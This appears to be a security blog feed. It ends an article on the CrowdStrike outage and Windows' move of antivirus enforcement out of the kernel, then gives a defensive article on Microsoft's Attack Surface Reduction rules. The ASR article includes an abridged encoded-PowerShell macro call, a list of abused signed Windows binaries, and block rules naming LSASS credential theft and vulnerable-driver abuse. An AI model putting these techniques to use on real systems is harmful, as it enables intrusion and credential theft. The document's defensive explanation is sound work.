No. Microsoft Windows behaved exactly as the kernel-driver architecture requires it to behave when a third-party kernel driver faults at elevated IRQL: the kernel had no way to recover, so it stopped. The bug was in CrowdStrike's `csagent.sys` driver consuming a malformed CrowdStrike Channel File. Microsoft's own July 27, 2024 security blog is unambiguous about this: the WinDBG walkthrough names `csagent.sys` as the faulting image and `nt!KiPageFault+0x369` as the kernel handler that received the fault [@ms-secblog-2024-07-27]. The architectural responsibility for the post-outage migration sits with Microsoft as the platform owner, but the proximate technical cause was a third-party kernel driver consuming a third-party content file [@cs-rca-2024-08-06]. Not necessarily. The user-mode EDR architecture closes the *reliability* problem -- a Channel-File-291-class bug in a vendor's content pipeline crashes the vendor's user-mode process, not the kernel. For the *coverage* gaps that user-mode loses on its own (direct syscalls, rootkit visibility, BYOVD detection), Microsoft is layering platform features below the user-mode EDR: hypervisor-assisted introspection via VBS and HVCI [@mslearn-hvci], the Vulnerable Driver Block List for BYOVD [@mslearn-driver-block-rules, @cisa-cm0058], and Defender as the baseline detection floor. Whether the combined stack reaches coverage equivalence with today's kernel-callback EDR is the article's central open question and the honest mid-2026 answer is that it is not yet settled [@weston-2025-06-26, @ms-nov-2025]. The strongest available public signal as of mid-2026 is the November 18, 2025 Microsoft Windows Experience Blog framing that *"AV enforcement"* (not *"third-party AV enforcement"*) is shifting from kernel to user mode -- by plain reading, that includes Defender for Endpoint [@ms-nov-2025]. No Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out graphics drivers, which continue to ship in kernel mode for performance reasons -- so the WRI is, narrowly, an AV-enforcement migration and not a wholesale third-party kernel-driver lockout [@ms-nov-2025]. Probably elevated, but no public primary source establishes the specific IRQL value. The article says only that the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way. Treat any IRQL-specific claim about Channel File 291 from a third-party source as speculation unless they cite a primary source that publishes the value. Microsoft's own July 27, 2024 post-mortem reproduces the WinDBG dump but does not publish the IRQL value at the moment of the fault [@ms-secblog-2024-07-27]; neither does CrowdStrike's August 6, 2024 Root Cause Analysis [@cs-rca-2024-08-06]. No. The Microsoft response is squarely a U.S.-side platform-stewardship response to a U.S.-litigated incident. European regulatory frameworks were part of the policy backdrop, and U.S. federal frameworks (Government Accountability Office, Congressional Research Service, House Homeland Security Subcommittee) shaped the political environment [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030]. But the proximate political cause was the operational loss of 8.5 million Windows hosts and the Congressional accountability event that followed; no regulatory body mandated the WRI's specific architectural choices. Architecturally it is not different in any structural way. Both were vendor content updates that caused vendor kernel drivers to misbehave at fleet scale. McAfee DAT 5958 was a false positive on `svchost.exe` that triggered the McAfee kernel driver to quarantine the system file, putting Windows XP SP3 fleets into reboot loops [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee]. CrowdStrike Channel File 291 was a parameter-count mismatch that triggered the CrowdStrike kernel driver to dereference an unmapped address, producing `PAGE_FAULT_IN_NONPAGED_AREA` [@cs-rca-2024-08-06]. The differences were the *scale* of the 2024 event (8.5 million Windows hosts versus a far smaller XP fleet in 2010) and the *cost calculus* -- by 2024, fourteen years of recurring kernel-driver-bricks-fleet incidents had raised the political cost of doing nothing past the point where Microsoft could be politically attacked for taking action [@three-buddy-ep5].

The seventy-eight-minute window of July 19, 2024 collapsed twenty years of political resistance to the Vista-era idea that vendor-authored kernel-mode code is a fleet-scale reliability liability, and accelerated Microsoft's Windows Resiliency Initiative into a multi-year, partner-coordinated migration that puts third-party endpoint security where Apple put it in 2019 [@apple-esf-docs] and where Microsoft itself had been quietly building the platform pieces since at least 2021 [@msft-ebpf-windows, @mslearn-hvci]. The 8.5 million figure from Brad Smith's morning-after blog post [@ms-bradsmith-2024-07-20] is the empirical anchor that supplied the political license; the Toulouse 2006 quote "either everybody has access to the kernel, or nobody does" [@informationweek-2006-toulouse] is the historical anchor that supplied the architectural answer; the Ionescu pivot of April 3, 2025 [@cs-ionescu-ctio-2025-04-03] is the political anchor that demonstrated the answer would not be fought.

Whether user-mode EDR with hypervisor-assisted memory introspection can deliver the coverage equivalence that twenty-five years of kernel-mode hooking has built is the next decade's research problem, and the honest mid-2026 answer is we do not yet know. The macOS seven-year ESF deployment supplies the strongest available yes evidence; the not-yet-stress-tested MVI 3.0 rings supply the strongest available not-yet-discriminated evidence; the BYOVD enforcement gap that no public source quantifies supplies the strongest available honest concern [@cisa-cm0058].

Key idea: July 19, 2024 did not invent the architecture; it provided the political license for an architecture two other operating systems had already validated. The next several years will tell us whether the architecture, transplanted to Windows under the WRI, reaches feature equivalence with the kernel-mode hooking it replaces, or whether the equivalence question is the wrong question and the right question is whether the platform features layered below the user-mode broker close enough of the coverage gap. The honest answer mid-2026 is that the question is genuinely open, and the next public evidence -- the first MVI 3.0 ring stop-gate event, the first Defender-kernel-out GA, the first quantified HVCI enablement statistic -- is the evidence to watch for.

Companion articles in this series cover the substrate pieces in more depth: EDR/Sysmon as the canonical user-mode consumer of kernel ETW telemetry [@mslearn-sysmon]; Vulnerable Driver Block List as Microsoft's BYOVD platform mitigation; Process Mitigation Policies and Defender for Endpoint baselines; and Event Tracing for Windows as the cross-cutting platform observability substrate.

Picture the release engineer at the CrowdStrike Falcon Cloud rollout console at 04:09 UTC on a Friday morning in July 2024, watching the deployment indicator go from staging to production for Channel File 291, with no idea that the seventy-eight-minute window about to open would be the most consequential window in twenty-five years of Windows security architecture. The engineer did everything right; the architecture, on that morning, did exactly what twenty-five years of decisions had configured it to do; and the next two years of Microsoft platform engineering, vendor-side rewrites, and political alignment exist to make sure that the next time something similar happens, it does not look like that.

Attack Surface Reduction Rules: The Quiet Layer That Stopped Office Macros

noreply@paragmali.com (Parag Mali) — Tue, 26 May 2026 00:00:00 GMT

**Attack Surface Reduction (ASR) rules are Microsoft's nineteen-rule, kernel-mediated, free-with-Windows behaviour block list.** Each rule names a single edge in the runtime process / file-system / registry graph -- Office spawning child processes, scripts launching downloaded executables, processes opening LSASS, vulnerable signed drivers being written -- and refuses to let it happen. Shipping since Windows 10 1709 (October 2017) [@ms-security-blog-exploit-guard-2017], the rules killed the cheap end of the Office-macro initial-access chain at the enterprise tier; the Microsoft 365 Apps default block of internet-marked macros (February and July 2022) [@ms-techcommunity-internet-macros-2022] and Europol's Operation LadyBird (January 2021) [@europol-emotet-disrupted-wayback] finished the era at the consumer tier and the C2 tier respectively. The layer is incomplete by construction -- Cohen-1984 undecidability forbids a complete behaviour catalogue [@cohen-1984-part1] -- but it compresses attacker bypass cost so effectively that the SOC routinely does not triage the blocks. Every rule emits a rule-specific Advanced Hunting `ActionType` such as `AsrOfficeChildProcessBlocked`; the folk-knowledge generic `AsrRuleTriggered` does not exist [@ms-learn-asr-reference].

1. One Block, No Analyst Ticket

At 03:42 on a Tuesday morning in Frankfurt, a finance analyst opens an invoice attached to an email that looks like one she has answered fifty times before. The document's Document_Open macro fires, the VBA calls Shell("powershell.exe -enc ..."), and nothing happens. No PowerShell window. No second-stage download. No banking-trojan loader. No ransom note three weeks later. The only artefact is one row in Microsoft Defender for Endpoint's DeviceEvents table, with ActionType equal to AsrOfficeChildProcessBlocked, that no analyst will triage because there is nothing left to triage [@ms-learn-asr-reference].

That row, and the silence around it, is the entire subject of this article.

To understand why nothing happened, watch the call in slow motion. WINWORD.EXE is a long-running user-mode process. The macro's process-creation call crosses the syscall boundary into the kernel's process-management subsystem, where Microsoft Defender Antivirus has registered a process-creation notify routine. Defender's kernel-mode driver WdFilter.sys -- registered with the Windows Filter Manager as a file-system minifilter AND with the kernel's process subsystem via PsSetCreateProcessNotifyRoutineEx -- intercepts the event through its process-creation notify routine before the new process runs and hands it to the user-mode antivirus engine MsMpEng.exe. (Section 5 walks the kernel/user-mode split in full.) MsMpEng.exe evaluates the rule with GUID D4F940AB-401B-4EFC-AADC-AD5F3C50688A -- "Block all Office applications from creating child processes" [@ms-learn-asr-reference]. The predicate evaluates true. The rule is set to Block. The minifilter fails the operation. The macro gets a non-zero error from its process-creation call. The spawn never happens.

A fixed catalogue of behavioural blocks shipped as a feature of Microsoft Defender Antivirus on Windows 10 1709 and later, Windows 11, and supported Windows Server editions. Each rule names a specific runtime behaviour -- "Office applications creating child processes," "credential stealing from the Windows local security authority subsystem," "abuse of exploited vulnerable signed drivers" -- and can be enabled in Audit, Warn, or Block mode through Microsoft Intune, Microsoft Configuration Manager, Group Policy, PowerShell, or the Defender for Endpoint portal. As of May 2026 the catalogue contains nineteen rules: three Standard protection rules and sixteen Other ASR rules [@ms-learn-asr-reference].

Notice what the rule did not do. It did not classify the binary. Both WINWORD.EXE and powershell.exe are signed by Microsoft. Both have multi-decade Authenticode reputation. Both have appeared on every reasonable allow-list since Windows 7. A signature engine, asked "is the macro malicious," would have had to read the macro's bytes, normalise its obfuscation, and decide whether the sequence of Office object-model calls plus a base64 blob constitutes hostile intent. That decision is hard in the easy cases and undecidable in general. The rule sidestepped the whole question. It classified the edge between two perfectly legitimate signed binaries: WINWORD.EXE becoming the parent of powershell.exe. The bytes are not the predicate. The parent-child relationship is.

The folklore that "every ASR block emits ActionType == 'AsrRuleTriggered'" survives in vendor playbooks and Stack Overflow answers but does not match Microsoft Learn's current rules reference, which enumerates a rule-specific Asr<RuleName>Audited and Asr<RuleName>Blocked pair for every rule except the server-only Webshell rule. The canonical Advanced Hunting filter is where ActionType startswith "Asr", not equality against a generic value [@ms-learn-asr-reference].

The Frankfurt analyst's hypothetical Tuesday is one of millions. Defender Antivirus ships on every supported edition of Windows [@ms-learn-asr-reference]. The Office-child-process rule has been blockable since October 2017 [@ms-security-blog-exploit-guard-2017]. It is not the only ASR rule, and ASR is not the only layer that ended the Emotet macro era. Europol's January 27, 2021 takedown and the Microsoft 365 Apps default block of internet macros in February and July 2022 share the credit. But ASR is the layer with the deepest enforcement substrate (a kernel-mode minifilter), the fullest behavioural catalogue (nineteen rules naming specific runtime edges), and the simplest mental model for a defender: name a behaviour, ship an enforcement edge, audit, then block.

Note: Signature engines classify nodes (is this binary malicious?). AppLocker classifies identities (is this binary on the allow-list?). ASR classifies edges in the runtime graph (did this specific parent-child invocation happen?). Section 5 builds the framework. The catalogue in Section 6 reads as nineteen named edges once you see it.

The rest of the article walks the ten questions the Frankfurt block raises. If signatures cannot tell us whether the analyst's macro is malicious -- because both binaries are signed and the static fingerprint of the macro changes every campaign -- how exactly did one row in DeviceEvents know to fire? What does the kernel see that the signature engine does not? Why did three predecessor paradigms (signatures, AppLocker, EMET) fail to close this specific gap, and what made October 2017 the moment Microsoft decided to ship a behaviour catalogue instead of a better classifier? Section 2 starts with the empirical signal that forced the shift.

2. Why Signatures Stopped Being Enough

By the time Microsoft published the October 23, 2017 Windows Defender Exploit Guard launch announcement, the team had a single sentence ready for the executive summary: "fileless attacks, which compose over 50% of all threats" [@ms-security-blog-exploit-guard-2017]. That line did two jobs. It justified shipping ASR. It also marked the moment the signature model hit its industrial-scale ceiling.

Despite advances in antivirus detection capabilities, attackers are continuously adapting ... This emerging trend of fileless attacks, which compose over 50% of all threats, are extremely dangerous, constantly changing, and designed to evade traditional AV. -- Microsoft Threat Intelligence team, October 23, 2017 [@ms-security-blog-exploit-guard-2017]

The 50-percent number is a 2017-vintage Microsoft characterisation, not a peer-reviewed empirical study, but it captures a structural shift that every endpoint-defence vendor had been watching for three years. Three forces had converged.

First, mature crypters and packers had defeated static signatures. The classic AV pipeline -- compute a hash, match against a corpus of known-bad hashes -- assumed attackers shipped a small number of stable binaries. By 2017 the typical commodity malware family rebuilt its payload on every campaign, layered three encryption stages, and emerged as a polymorphic blob whose static fingerprint changed faster than the signature feed. Fred Cohen had warned in 1984 that any complete malicious-program detector reduces to the Halting Problem [@cohen-1984-part1]; commodity packers were the industrial-scale form of that result.

Second, attackers had moved off custom binaries entirely. The Living-Off-the-Land Binaries, Scripts, and Libraries project -- LOLBAS -- catalogues over two hundred Microsoft-signed Windows binaries that attackers use to execute malicious behaviour without dropping any malware artefact on disk [@lolbas-project]. powershell.exe, cmd.exe, wscript.exe, mshta.exe, regsvr32.exe, rundll32.exe, cmstp.exe, msdt.exe, msbuild.exe, installutil.exe -- all signed by Microsoft, all on every reasonable allow-list, all capable of executing arbitrary code given the right command line. The on-disk artefact is benign; the malice lives in the runtime edge between two signed binaries.

A signed Microsoft Windows binary that attackers use to execute malicious behaviour while staying off identity-based allow-lists. The LOLBAS Project enumerates over two hundred such binaries together with the abuse classes each enables and the MITRE ATT&CK techniques each maps to [@lolbas-project].

Third, Office macros had become the dominant initial-access vector. Emotet first appeared as a banking trojan in June 2014; by 2017 it had transformed into a crime-as-a-service loader platform that delivered TrickBot, Dridex, IcedID, and eventually Conti and Ryuk to its access buyers [@welivesecurity-emotet-pivot-2022]. The delivery vehicle barely changed across that pivot: a Word or Excel document, a Visual Basic for Applications macro, a call into Shell, WScript.Shell.Run, or the Windows Management Instrumentation provider to spawn the next stage. The malice was never inside WINWORD.EXE. The malice was in the edge that connected WINWORD.EXE to whichever signed Microsoft binary the operator decided to spawn.

The NTFS alternate data stream `Zone.Identifier` written by browsers, mail clients, and archive extractors to flag a file as originating from outside the local machine. Office uses the MOTW to drop a downloaded document into Protected View; the February 2022 Microsoft 365 Apps internet-macro default block treats the MOTW as the trigger to remove the "Enable Content" button entirely [@ms-learn-internet-macros-blocked].

The pre-2017 defence stack covered slices of this problem, but no layer covered the specific behaviour class "an Office application creates a child process." AV signatures and heuristics scored the binaries; both were signed Microsoft binaries. AppLocker (2009) decided whether a binary was allowed to run; both were on the allow-list. EMET (2009) blocked memory-corruption exploit primitives; the macro chain involved no memory corruption. Reputation-based file blocking covered downloaded payloads; the payload was a base64 string passed on the PowerShell command line, never written to disk. Each layer answered a different question. None answered the question the macro chain raised.

The strategic shift Microsoft eventually made was small in the framing and enormous in the consequences. Instead of asking "is this binary malicious?" -- a question undecidable in general -- the next layer would ask "did the suspicious behaviour happen?" The new question is decidable per event at the OS interception layer, because the kernel sees every process-creation call, every image load, every file write, every registry set. Edge classification does not require static analysis; it requires only that the kernel be wired to ask one extra predicate before completing the operation.

The named author at the bottom of the 2017 launch post body (fetched 2026-05-26) is Misha Kutsovsky (@mkutsovsky), Program Manager, Windows Active Defense. The top-of-page byline and <meta name="author"> tag have since been consolidated under the "Microsoft Threat Intelligence" institutional account during Microsoft's 2022-2025 re-platforming of older Security Blog posts; the in-body attribution is unchanged. This article cites the institutional author as it appears in the page head; the named person at the bottom of the body is Kutsovsky [@ms-security-blog-exploit-guard-2017].

One taxonomy point deserves its own paragraph, because confusion about it shapes most beginner questions about ASR. Microsoft Defender Antivirus is the on-host scanning engine that ships free with every Windows edition. Microsoft Defender for Endpoint (MDE) is the cloud-managed EDR layer Microsoft sells on top. ASR rules live inside Defender Antivirus. They run whether or not the device is enrolled in MDE. MDE adds management, telemetry ingestion through the DeviceEvents table, and Advanced Hunting; it does not add the enforcement. The Frankfurt block fires in Defender Antivirus; the DeviceEvents row only reaches MDE if MDE is connected. The EDR-in-block-mode page is explicit on the dependency: ASR rules run only when Defender Antivirus is in Active mode, never when a third-party AV is primary and Defender is passive [@ms-learn-edr-in-block-mode].

By 2014-2015 the Microsoft Defender team had identified the problem. They did not invent the answer from scratch. They inherited a Windows defence stack that had been trying to solve the same problem for sixteen years, in three earlier paradigms. What were they, and why did none of them stop Emotet?

3. AppLocker, EMET, and What They Could Not Do

Three predecessor paradigms. Three different failures. Three different lessons that Microsoft eventually folded into the design of ASR.

AppLocker (2009, Windows 7)

AppLocker was the identity-based answer to the question "which binaries are allowed to run on this endpoint?" Administrators write rules that allow or deny executable code by publisher, by path, or by file hash; the kernel enforces the policy at process-creation time. Microsoft Learn still describes AppLocker as the Windows 7-era predecessor to App Control for Business, and the design has not changed structurally in the intervening sixteen years [@ms-learn-applocker]. AppLocker is genuinely stricter than ASR on the identity axis. A well-tuned AppLocker policy on a hardened endpoint enforces default-deny: only allowed publishers, only allowed paths, only allowed hashes ever execute.

AppLocker has two practical weaknesses and one structural one. The first practical weakness is brittleness against signed LOLBins: powershell.exe, cmd.exe, wscript.exe, mshta.exe, regsvr32.exe, rundll32.exe, cmstp.exe, msdt.exe, msbuild.exe, installutil.exe are all on every reasonable AppLocker allow-list because every legitimate IT-automation pipeline depends on them [@lolbas-project]. The second is admin-deployment overhead: every new line-of-business application needs an explicit rule addition, large estates fall back to Audit mode permanently, and exception sprawl turns the policy into a sieve.

The structural weakness is the one that matters here. The AppLocker rule grammar has no slot for "WINWORD.EXE may run, but it may not be the parent of cmd.exe." That sentence is a property of an edge in the runtime graph, and the AppLocker schema models nodes, not edges.

EMET (2009-2018)

The Enhanced Mitigation Experience Toolkit was Microsoft's per-process opt-in exploit-time mitigation framework. Data Execution Prevention, Address Space Layout Randomization, Structured Exception Handler Overwrite Protection, the Export Address Table Access Filter, anti-Return-Oriented-Programming heuristics, caller-checks, heap-spray pre-allocation -- EMET stitched the menu together for any process the administrator opted in. EMET stopped buffer overflows from achieving code execution. It made the cheap exploit-development pipeline visibly more expensive.

EMET did not stop the Emotet macro chain. The chain involved no memory corruption. The chain was a legitimately loaded, uncorrupted, signed Office application making a perfectly ordinary user-mode parent-child process-creation call. There was no exploit primitive to mitigate. The 2017 Exploit Guard launch announcement said the same in cleaner language: Exploit Protection (the Windows-integrated pillar that absorbed EMET's mitigations) and Attack Surface Reduction (the new pillar) cover different gaps, because exploit-time mitigations and post-exploit behaviour blocks address different attacker stages [@ms-security-blog-exploit-guard-2017]. EMET reached end-of-life on July 31, 2018 per the Microsoft product lifecycle page [@ms-lifecycle-emet]; its mitigations live on under different names in the Exploit Protection panel of Windows Security.

Signature and heuristic AV

The third predecessor is the one Cohen's 1984 paper had already analysed. Signature and heuristic AV classify nodes, which is to say they answer "is this binary, considered as a sequence of bytes, malicious?" Cohen proved that the general form of that question reduces to the Halting Problem. The verbatim sentence from his open-access archive is the cleanest one-line statement of the result [@cohen-1984-part1]:

The classical result, established in Fred Cohen's 1984 paper "Computer Viruses: Theory and Experiments" (presented at the 7th DoD/NBS Computer Security Conference and reprinted in Computers and Security 6(1):22-35 in January 1987), that detection of arbitrary viral behaviour in a program reduces to the Halting Problem. The diagonal construction assumes a decider `D(P)` for viral behaviour; constructs a program `V` that calls `D(V)` and behaves virally iff `D(V) = 0`; derives a contradiction. The corollary -- any non-trivial semantic property of programs is undecidable -- is the Rice-1953 generalisation [@cohen-1984-part1].

The practical version of the ceiling for the Emotet case is that a signature engine cannot, in general, distinguish a Word macro that legitimately spawns cmd.exe to run an IT-automation script from a Word macro that spawns cmd.exe to launch the Emotet stage-two PowerShell stub. Both call the same Win32 API. Both pass argument strings the engine cannot prove are malicious without modelling the operator's intent. The fingerprint of the malice is not in the binaries; it is in the runtime relationship between them.

The three paradigms -- signature, identity, edge -- are not redundant. Modern defence-in-depth runs all three because each closes a different attacker option. Signatures detect known-bad binaries cheaply; identity controls restrict which binaries may run at all; edge classification refuses specific behavioural relationships among allowed binaries. AppLocker without ASR lets `WINWORD` spawn PowerShell. ASR without AppLocker permits any unsigned binary to ship with the next campaign. Neither alone covers the gap. Section 7 makes the layering explicit as a comparison matrix.

The three together demonstrate that the Windows endpoint defence stack of 2017 was structurally node-classifying or identity-classifying, with no layer modelling the runtime edge. The strategic gap is the slot ASR was designed to fill.

On October 17, 2017, Microsoft shipped Windows 10 Fall Creators Update (build 1709) [@windows-blog-fall-creators-update-2017]. Six days later, the Microsoft Security Blog named the new pillar: Attack Surface Reduction [@ms-security-blog-exploit-guard-2017]. What did the first eight rules do, and how did they finally model the edge that AppLocker, EMET, and signatures could not?

4. The Evolution, Generation by Generation

October 23, 2017. The Microsoft Security Blog publishes "Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware" [@ms-security-blog-exploit-guard-2017]. The post names four pillars: Attack Surface Reduction, Network Protection, Controlled Folder Access, and Exploit Protection. The first pillar ships with eight rules. Nine years later the catalogue is nineteen rules wide. Each generation closed a specific attacker behaviour; each generation produced a published bypass within months.

flowchart TD G1["Gen 1 - Oct 2017 (1709) - 8 Office, script, email rules"] G2["Gen 2 - 2018-2019 (1803-1903) - LSASS, PSExec/WMI, prevalence, Adobe, WMI persistence"] G3["Gen 3 - Apr 2020 - Warn mode added, platform 4.18.2008.9"] G4a["Gen 4a - Dec 2021 / 2022 - BYOVD rule, Vulnerable Driver Reporting Center"] G4b["Gen 4b - Feb/Jul 2022 - Parallel layer, M365 Apps internet-macro default block"] G5["Gen 5 - 2023-2026 - Standard protection partition, Webshell, Safe Mode reboot, copied tools, USB, Outlook child-process rules"] G1 --> G2 --> G3 --> G4a --> G4b --> G5

Generation 1, October 2017 -- the eight launch rules

The launch rules, as listed verbatim in the 2017 announcement, are the Office-macro response pack [@ms-security-blog-exploit-guard-2017]:

Block Office applications from creating executable content
Block Office applications from launching child processes
Block Office applications from injecting into other processes
Block Win32 imports from macro code in Office
Block obfuscated macro code (and other obfuscated scripts, AMSI-backed)
Block JavaScript or VBScript from launching downloaded executable content
Block execution of executable content dropped from email or webmail
Block malicious JavaScript and VBScript scripts (AMSI-backed)

None of these rules solves a node-classification problem. Each rule names a single edge in the runtime process / file-system / registry graph and refuses to let it happen. "Block Office applications from creating child processes" is not "is WINWORD.EXE malicious?" but "did WINWORD.EXE just try to be the parent of another process?" The kernel answers the question with one comparison against the parent image path.

Generation 2, 2018-2019 -- credential theft, lateral movement, persistence

Between Windows 10 1803 (April 2018) and 1903 (May 2019) the catalogue expanded beyond Office to the rest of the attacker intrusion chain. Six new rules with their GUIDs, from the Microsoft Learn rules reference [@ms-learn-asr-reference]:

Block credential stealing from the Windows local security authority subsystem -- 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -- introduced 1803. The Mimikatz response: refuse process handles to lsass.exe with rights sufficient to read its address space.
Block executable files from running unless they meet a prevalence, age, or trusted list criterion -- 01443614-cd74-433a-b99e-2ecdc07bfc25 -- 1803. The unique-binary-per-campaign response, leaning on cloud-protection (MAPS) reputation.
Block process creations originating from PSExec and WMI commands -- d1e49aac-8f56-4280-b9ba-993a6d77406c -- 1803. The Emotet lateral-movement response.
Use advanced protection against ransomware -- c1db55ab-c21a-4637-bb3f-a12568109d35 -- 1803. The mass-encryption-detection response, also cloud-protection-dependent.
Block Adobe Reader from creating child processes -- 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c -- 1809. The PDF-exploit-spawning-payload response.
Block persistence through WMI event subscription -- e6db77e5-3df2-4cf1-b95a-636979351e5b -- 1903. The APT29 / Cobalt Strike __FilterToConsumerBinding response.

Each rule is a direct response to a specific attacker move. The LSASS rule answers Mimikatz. The PSExec/WMI rule answers Emotet's lateral movement. The WMI persistence rule answers permanent-implant techniques that survive reboot through the WMI repository.

The PSExec/WMI rule (d1e49aac-...) is the textbook example of an ASR rule with high enterprise friction. Microsoft Configuration Manager (formerly SCCM) relies heavily on WMI; Microsoft Learn's overview page explicitly tells administrators not to set this rule to Block or Warn without extensive Audit-mode testing if Configuration Manager manages the device, "because the Configuration Manager client relies heavily on WMI" [@ms-learn-asr-overview]. Most large estates therefore run this rule in Audit indefinitely.

Generation 3, April 2020 -- Warn mode

Until 2020, the only choices for an ASR rule were Audit (logs only) and Block (the operation fails). The middle ground was a productivity problem: a power user whose legitimate IT-automation macro was being blocked had no recourse short of a help-desk ticket. The Microsoft Defender team's "Demystifying attack surface reduction rules - Part 1" Tech Community post, modified time April 22, 2020, announced the third mode -- Warn -- with a user-facing block dialog and a 24-hour per-user per-rule per-app exclusion cache [@techcommunity-demystifying-asr-part1].

Two precision facts deserve to be stated cleanly, because both contradict secondary-source folklore.

First, the platform prerequisite for Warn mode is Microsoft Defender Antivirus platform release 4.18.2008.9 (August 2020) or later, engine release 1.1.17400.5 or later [@ms-learn-asr-overview]. The older secondary-blog claim of "4.18.2001.10 / January 2020" is contradicted by Microsoft Learn's current canonical page and should not be repeated.

Second, exactly two ASR rules deliberately skip Warn mode and go straight from Audit to Block, not five. Microsoft Learn's overview page lists them verbatim: "Block credential stealing from the Windows local security authority subsystem" and "Block Office applications from injecting code into other processes" [@ms-learn-asr-overview]. The folklore that lists five no-Warn rules (sometimes including the Webshell rule, the Safe Mode reboot rule, and the copied-tools rule) is wrong. The rules reference page enumerates Warn-mode bypass ActionType variants for the Safe Mode reboot rule (AsrSafeModeRebootWarnBypassed) and the copied-tools rule (AsrAbusedSystemToolWarnBypassed) -- direct byte-level proof that those rules do support Warn [@ms-learn-asr-reference].

flowchart LR A["Audit - Log only, no enforcement"] --> W["Warn - User can bypass for 24h"] W --> B["Block - Operation fails"] A2["LSASS rule and Office injection rule"] --> A A2 --> B

The reason these two rules skip Warn is structural, not cosmetic. A low-privilege user cannot meaningfully consent to a process opening LSASS memory; the consent dialog would itself be a credential-theft enabler. Likewise, a non-admin user cannot rationally decide whether WINWORD.EXE should be allowed to inject shellcode into explorer.exe; the request encodes its own malice. The remaining sixteen rules support the full Audit, Warn, Block ladder.

Generation 4a, December 2021 -- the BYOVD rule

The 2020-2022 era brought a new attacker move into mainstream incident response: Bring Your Own Vulnerable Driver, or BYOVD. The attacker imports a legitimate, signed, but vulnerable kernel driver, exploits its bug to gain kernel-mode primitives, uses those primitives to disable EDR and antivirus monitoring, and proceeds.

The 2021 motivating events made the threat unambiguous. Lazarus's autumn-2021 abuse of CVE-2021-21551 (Dell dbutil_2_3.sys) was the first recorded in-the-wild abuse of that driver, disclosed by ESET on September 30, 2022 [@welivesecurity-lazarus-byovd-2022] [@nvd-cve-2021-21551]. BlackByte's October 2022 abuse of CVE-2019-16098 (MSI Afterburner RTCore64.sys) was documented by Sophos with one of the year's defining lines: "disabling a whopping list of over 1,000 drivers on which security products rely to provide protection" [@sophos-blackbyte-returns-2022] [@nvd-cve-2019-16098].

An attack pattern in which the operator imports a signed but exploitable kernel driver into the victim environment, exploits a known driver vulnerability to obtain kernel-mode primitives (typically arbitrary memory read or write), and uses those primitives to disable security telemetry. CVE-2021-21551 (Dell DBUtil) and CVE-2019-16098 (MSI Afterburner) are the canonical examples; the Sophos write-up of BlackByte's RTCore64.sys abuse documents disabling roughly one thousand security-product drivers [@nvd-cve-2021-21551] [@nvd-cve-2019-16098] [@sophos-blackbyte-returns-2022].

Microsoft launched the Vulnerable and Malicious Driver Reporting Center on December 8, 2021, explicitly naming the new ASR rule as the enforcement layer alongside the kernel-load-time Vulnerable Driver Blocklist [@ms-security-blog-vulnerable-driver-center]. The ASR rule is "Block abuse of exploited vulnerable signed drivers (Device)" -- GUID 56a863a9-875e-4185-98a7-b882c64b5ce5 [@ms-learn-asr-reference]. The Windows 11 22H2 release on September 20, 2022 [@windows-blog-windows-11-2022-update] made the Microsoft Vulnerable Driver Blocklist default-on for all devices, which is the kernel-load-time sibling to the ASR write-time block [@ms-learn-driver-block-rules].

Generation 4b, February and July 2022 -- the parallel layer

This is the generation that deserves the most honest framing in the article, because the marketing version oversimplifies what actually happened to Office macros.

Tom Gallagher's February 7, 2022 Microsoft 365 Blog post announces the default block of VBA macros in MOTW-internet documents [@ms-techcommunity-internet-macros-2022]. The trust bar removes the "Enable Content" button entirely. Microsoft pauses the rollout on July 8, 2022 for usability adjustments, then resumes on July 20, 2022 -- both dates verifiable from the post's article:modified_time metadata. ESET's June 2022 write-up confirms the intended effect: between April 26 and May 2, 2022 Emotet operators were already testing LNK and ISO replacements for the macro carrier [@welivesecurity-emotet-pivot-2022].

A wide range of threat actors continue to target our customers by sending documents and luring them into enabling malicious macro code. -- Tom Gallagher, Partner Group Engineering Manager, Office Security, February 7, 2022 [@ms-techcommunity-internet-macros-2022]

The Microsoft 365 Apps default block is not a generation of ASR. It is a parallel layer that ships inside Office, runs against every Microsoft 365 Apps installation managed or unmanaged, and uses the MOTW as its trigger rather than the kernel-mode minifilter. It cooperates with ASR; it does not subsume ASR.

The popular "ASR stopped Office macros" claim is half right. The Office-macro era ended through three layers in combination: (1) Europol's Operation LadyBird on January 27, 2021, coordinated international takedown of Emotet's command-and-control infrastructure [@europol-emotet-disrupted-wayback]; (2) ASR's 2017-onward Office rules at the enterprise tier, managed through Intune, Group Policy, or Defender for Endpoint; (3) the Microsoft 365 Apps internet-macro default block at the consumer and tenant tier, default-on for every Microsoft 365 installation since the July 2022 staged rollout [@ms-techcommunity-internet-macros-2022]. ASR is the enterprise-managed layer; it was not the only layer. The polished version of the story names all three.

A coincidence worth noting: Europol's Operation LadyBird seized Emotet's command-and-control infrastructure on January 27, 2021 [@europol-emotet-disrupted-wayback]. SANS Internet Storm Center Diary 27036, published the same day by handler Daniel Wesemann, documented the canonical WMI-grandparent bypass to the Office-child-process ASR rule [@sans-isc-27036-emotet-asr]. A takedown and a bypass landed on the same Wednesday.

Generation 5, 2023-2026 -- Standard protection and the long tail

By 2023 Microsoft had enough deployment telemetry to partition the rules into two categories. The Standard protection rules are the three with a low false-positive floor, safe to enable in Block mode without staged rollout: BYOVD, LSASS credential-theft, and WMI persistence [@ms-learn-asr-overview]. The remaining sixteen are Other ASR rules and require the full Audit, Warn, Block ladder. Several new rules landed in this period [@ms-learn-asr-reference]:

Block Webshell creation for Servers -- a8f5898e-1dc8-49a9-9878-85004b8a61e6 -- the post-HAFNIUM / ProxyShell response. This is the only rule in the catalogue whose row in the Microsoft Learn reference shows "N" for EDR alerts, meaning it does not emit a paired Audited and Blocked ActionType in DeviceEvents. Defenders hunt blocked webshell drops through MpCmdRun.log and IIS access logs, not Advanced Hunting.
Block rebooting machine in Safe Mode -- 33ddedf1-c6e0-47cb-833e-de6133960387 -- the BlackByte-era safe-mode-encryption response.
